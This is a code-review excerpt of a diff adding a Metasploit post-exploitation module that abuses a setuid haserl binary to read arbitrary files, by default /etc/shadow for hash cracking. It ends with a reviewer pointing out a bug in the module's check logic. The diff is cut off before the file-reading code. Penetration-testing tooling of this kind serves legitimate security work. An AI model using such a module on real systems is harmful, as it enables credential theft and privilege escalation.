modules/post/linux/gather/haserl_read.rb

```diff
@@ -0,0 +1,74 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::File
+  include Msf::Post::Linux::System
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Haserl Arbitrary File Reader',
+        'Description' => %q{
+          This module exploits haserl to read arbitrary files.
+          The most widely accepted exploitation vector is reading /etc/shadow,
+          which will reveal root's hash for cracking.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Julien (jvoisin) Voisin', # metasploit module
+          'Ike Broflovski' # discovery
+        ],
+        'Platform' => [ 'linux' ],
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'References' => [
+          ['URL', 'https://twitter.com/steaIth/status/1364940271054712842'],
+        ]
+      )
+    )
+    register_options([
+      OptString.new('RFILE', [true, 'File to read', '/etc/shadow']),
+      OptString.new('BIN', [true, 'Haserl binary', '/usr/bin/haserl-lua5.1']),
+    ])
+  end
+
+  def check
+    unless command_exists?(datastore['BIN'])
+      return Exploit::CheckCode::Safe("#{datastore['BIN']} is not installed")
+    end
+
+    unless setuid? datastore['BIN']
+      return Exploit::CheckCode::Safe("#{datastore['BIN']} is not setuid")
+    end
+
+    Exploit::CheckCode::Appears
+  end
+
+  def run
+    if is_root?
+      fail_with(Failure::BadConfig, 'Session already has root privileges')
+    end
+
+    unless check
```

Comment:
I don't think this works as intended. `check` should always return something. You probably want:

```suggestion
    unless check == Exploit::CheckCode::Appears
```